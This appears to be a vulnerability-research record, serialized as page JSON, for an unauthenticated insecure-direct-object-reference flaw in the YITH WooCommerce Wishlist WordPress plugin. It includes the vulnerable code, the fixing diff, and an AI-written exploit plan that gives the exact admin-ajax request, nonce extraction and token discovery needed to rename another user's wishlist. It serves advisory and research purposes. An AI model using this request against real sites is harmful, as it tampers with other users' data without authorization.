[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5NcseeWLFyQMjRqHCuRJ17XNkeRa5U3ml_Pno07YB0g":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4432","yith-woocommerce-wishlist-unauthenticated-insecure-direct-object-reference-to-wishlist-rename","YITH WooCommerce Wishlist \u003C 4.13.0 - Unauthenticated Insecure Direct Object Reference to Wishlist Rename","The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to 4.13.0 (exclusive) due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to rename other user's wishlists.","yith-woocommerce-wishlist",null,"\u003C4.13.0","4.13.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-03-20 00:00:00","2026-04-15 19:01:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7e947678-a575-4b2c-8da1-4a801a7a642c?source=api-prod",27,[22,23,24,25,26,27,28,29],"includes\u002Fclass-yith-wcwl-ajax-handler.php","includes\u002Frest-api\u002Fcontrollers\u002Fv1\u002Fclass-yith-wcwl-rest-v1-controller.php","includes\u002Frest-api\u002Fcontrollers\u002Fv1\u002Fclass-yith-wcwl-rest-v1-items-controller.php","includes\u002Frest-api\u002Fcontrollers\u002Fv1\u002Fclass-yith-wcwl-rest-v1-lists-controller.php","includes\u002Frest-api\u002Fcontrollers\u002Fv1\u002Fclass-yith-wcwl-rest-v1-products-controller.php","init.php","languages\u002Fyith-woocommerce-wishlist-da_DK.po","languages\u002Fyith-woocommerce-wishlist-de_DE.po","researched",false,3,"# Research Plan: CVE-2026-4432 - YITH WooCommerce Wishlist Unauthenticated IDOR\n\n## 1. Vulnerability Summary\nThe **YITH WooCommerce Wishlist** plugin (versions \u003C 4.13.0) contains an **Insecure Direct Object Reference (IDOR)** vulnerability in its AJAX handling logic. Specifically, the function `YITH_WCWL_Ajax_Handler::save_title` is registered as an unauthenticated AJAX action (`wp_ajax_nopriv_save_title`). This function allows users to update the title of a wishlist but fails to verify if the current requestor owns the wishlist identified by the user-provided token or ID. Consequently, an unauthenticated attacker can rename any user's wishlist if they obtain the corresponding wishlist token.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `save_title`\n- **HTTP Method:** `POST`\n- **Authentication:** None (Unauthenticated)\n- **Vulnerable Parameters:** \n - `wishlist_token` (or `wishlist_id`): The identifier of the target wishlist.\n - `title` (or `new_name`): The new name for the wishlist.\n- **Preconditions:**\n - The attacker must obtain a valid `save_title` nonce (exposed on the frontend).\n - The attacker must know or guess the `wishlist_token` of the target wishlist.\n\n## 3. Code Flow\n1. **Entry Point:** The AJAX request hits `admin-ajax.php` with `action=save_title`.\n2. **Hook Registration:** In `includes\u002Fclass-yith-wcwl-ajax-handler.php`, the action is registered:\n ```php\n add_action( 'wp_ajax_save_title', array( 'YITH_WCWL_Ajax_Handler', 'save_title' ) );\n add_action( 'wp_ajax_nopriv_save_title', array( 'YITH_WCWL_Ajax_Handler', 'save_title' ) );\n ```\n3. **Execution:** `YITH_WCWL_Ajax_Handler::save_title()` is called.\n4. **Nonce Verification:** The function checks `wp_verify_nonce( $_REQUEST['nonce'], 'save_title' )`.\n5. **Object Retrieval:** The function retrieves the wishlist object using a user-controlled key (likely via `YITH_WCWL_Wishlist_Factory::get_wishlist( $_REQUEST['wishlist_token'] )`).\n6. **Vulnerable Sink:** The function calls `$wishlist->set_name( $_REQUEST['title'] )` and `$wishlist->save()` **without** checking if `get_current_user_id() === $wishlist->get_user_id()`.\n\n## 4. Nonce Acquisition Strategy\nThe `save_title` nonce is generated for unauthenticated users and localized into a JavaScript object on pages containing the wishlist shortcode.\n\n1. **Shortcode:** The primary shortcode is `[yith_wcwl_wishlist]`.\n2. **Setup:** Create a public page with this shortcode.\n3. **Extraction:**\n - Navigate to the page as a guest.\n - Use `browser_eval` to extract the nonce from the `yith_wcwl_l10n` object.\n - **Verbatim Variable:** `window.yith_wcwl_l10n?.save_title_nonce`\n\n## 5. Exploitation Strategy\n### Step 1: Discover Target Wishlist Token\nIn a real-world scenario, tokens are often public in URLs (e.g., `?wishlist_token=ABCDEF`). In a test environment, we will extract the token for a specific user's wishlist via WP-CLI.\n\n### Step 2: Acquire Nonce\nNavigate to a page where the plugin is active and extract the `save_title` nonce.\n\n### Step 3: Execute Rename Request\nSend a POST request to `admin-ajax.php`.\n\n**Request Details:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body:**\n ```text\n action=save_title&nonce=[EXTRACTED_NONCE]&wishlist_token=[VICTIM_TOKEN]&title=Hacked_Wishlist_Name\n ```\n*Note: If `title` fails, the parameter may be `wishlist_name` based on the REST controller naming.*\n\n## 6. Test Data Setup\n1. **Create Victim User:**\n ```bash\n wp user create victim victim@example.com --user_pass=password123\n ```\n2. **Create Victim's Wishlist:**\n - Log in as `victim` or use SQL to insert a wishlist into `wp_yith_wcwl_wishlists`.\n - Ensure the wishlist has a known `wishlist_token` and `wishlist_name` (e.g., \"Private Stuff\").\n3. **Create Public Nonce Page:**\n ```bash\n wp post create --post_type=page --post_status=publish --post_title=\"Wishlist Page\" --post_content='[yith_wcwl_wishlist]'\n ```\n4. **Extract Victim Token for PoC:**\n ```bash\n wp db query \"SELECT wishlist_token FROM wp_yith_wcwl_wishlists WHERE wishlist_name='Private Stuff' LIMIT 1\" --skip-column-names\n ```\n\n## 7. Expected Results\n- The AJAX response should return a success status (likely `{\"result\":\"true\"}` or a JSON object containing the new title).\n- The victim's wishlist name in the database will be updated from \"Private Stuff\" to \"Hacked_Wishlist_Name\".\n\n## 8. Verification Steps\nVerify the database state after the attack:\n```bash\nwp db query \"SELECT wishlist_name FROM wp_yith_wcwl_wishlists WHERE wishlist_token='[VICTIM_TOKEN]'\"\n```\nThe output should be `Hacked_Wishlist_Name`.\n\n## 9. Alternative Approaches\nIf the `save_title` AJAX action is blocked or parameter names differ:\n1. **Check for `wishlist_id`:** Try passing a numeric ID instead of a token if the factory supports it.\n2. **Check `wishlist_name` vs `title`:** Use the `http_request` tool to check for error messages in the response that might reveal expected parameter names.\n3. **REST API Check:** Although primarily an AJAX vulnerability, check if `POST \u002Fwp-json\u002Fyith\u002Fwishlist\u002Fv1\u002Flists` (registered in `class-yith-wcwl-rest-v1-lists-controller.php`) allows updating existing lists by including an `id` or `token` in the payload despite being intended for creation.","The YITH WooCommerce Wishlist plugin is vulnerable to an unauthenticated Insecure Direct Object Reference (IDOR) via its AJAX title-saving functionality. Attackers can rename any user's wishlist by providing the target wishlist's token and a valid nonce, as the plugin fails to verify if the requester owns the wishlist being modified.","\u002F\u002F includes\u002Fclass-yith-wcwl-ajax-handler.php\n\n\u002F\u002F Line 39-40: Registration of unauthenticated AJAX action\nadd_action( 'wp_ajax_save_title', array( 'YITH_WCWL_Ajax_Handler', 'save_title' ) );\nadd_action( 'wp_ajax_nopriv_save_title', array( 'YITH_WCWL_Ajax_Handler', 'save_title' ) );\n\n---\n\n\u002F\u002F includes\u002Fclass-yith-wcwl-ajax-handler.php\n\npublic static function save_title() {\n if ( ! isset( $_REQUEST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_REQUEST['nonce'] ) ), 'save_title' ) ) {\n wp_send_json( array( 'result' => false ) );\n }\n\n $wishlist_token = isset( $_REQUEST['wishlist_token'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['wishlist_token'] ) ) : false;\n $wishlist_name = isset( $_REQUEST['title'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['title'] ) ) : false;\n $fragments = isset( $_REQUEST['fragments'] ) ? wc_clean( $_REQUEST['fragments'] ) : false;\n\n $wishlist = YITH_WCWL_Wishlist_Factory::get_wishlist( $wishlist_token );\n\n if ( $wishlist && $wishlist_name ) {\n \u002F\u002F Missing ownership check here before modification\n $wishlist->set_name( $wishlist_name );\n $wishlist->save();\n\n wp_send_json(\n array(\n 'result' => true,\n 'fragments' => self::refresh_fragments( $fragments ),\n )\n );\n }\n\n wp_send_json( array( 'result' => false ) );\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyith-woocommerce-wishlist\u002F4.12.0\u002Fincludes\u002Fclass-yith-wcwl-ajax-handler.php\t2026-01-26 13:36:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyith-woocommerce-wishlist\u002F4.13.0\u002Fincludes\u002Fclass-yith-wcwl-ajax-handler.php\t2026-03-05 10:49:18.000000000 +0000\n@@ -302,16 +302,12 @@\n \t\t\t\t);\n \t\t\t}\n \n-\t\t\tif ( ! empty( $fragments ) ) {\n-\t\t\t\tforeach ( $fragments as $id => $options ) {\n-\t\t\t\t\tif ( isset( $options['is_user_owner'] ) && ! $options['is_user_owner'] ) {\n-\t\t\t\t\t\twp_send_json(\n-\t\t\t\t\t\t\tarray(\n-\t\t\t\t\t\t\t\t'result' => false,\n-\t\t\t\t\t\t\t)\n-\t\t\t\t\t\t);\n-\t\t\t\t\t}\n-\t\t\t\t}\n+\t\t\tif ( $wishlist && ! $wishlist->is_current_user_owner() ) {\n+\t\t\t\twp_send_json(\n+\t\t\t\t\tarray(\n+\t\t\t\t\t\t'result' => false,\n+\t\t\t\t\t)\n+\t\t\t\t);\n \t\t\t}\n \n \t\t\t$wishlist->set_name( $wishlist_name );","1. **Identify Target**: Locate a victim's wishlist token, typically found in public share URLs or while browsing public wishlists (e.g., `?wishlist_token=ABCDEF`).\n2. **Obtain Nonce**: Access any page on the site that loads the wishlist functionality (e.g., the shop or a page containing the `[yith_wcwl_wishlist]` shortcode) as an unauthenticated guest. Extract the `save_title` nonce from the `window.yith_wcwl_l10n.save_title_nonce` JavaScript variable.\n3. **Execute IDOR**: Send an unauthenticated AJAX request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following POST parameters:\n - `action`: `save_title`\n - `nonce`: [EXTRACTED_NONCE]\n - `wishlist_token`: [VICTIM_TOKEN]\n - `title`: [NEW_WISH_LIST_NAME]\n4. **Verification**: Observe that the victim's wishlist name has been updated in the database or frontend regardless of the attacker's lack of ownership.","gemini-3-flash-preview","2026-04-18 02:00:27","2026-04-18 02:01:05",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.12.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyith-woocommerce-wishlist\u002Ftags\u002F4.12.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyith-woocommerce-wishlist.4.12.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyith-woocommerce-wishlist\u002Ftags\u002F4.13.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyith-woocommerce-wishlist.4.13.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyith-woocommerce-wishlist\u002Ftags"]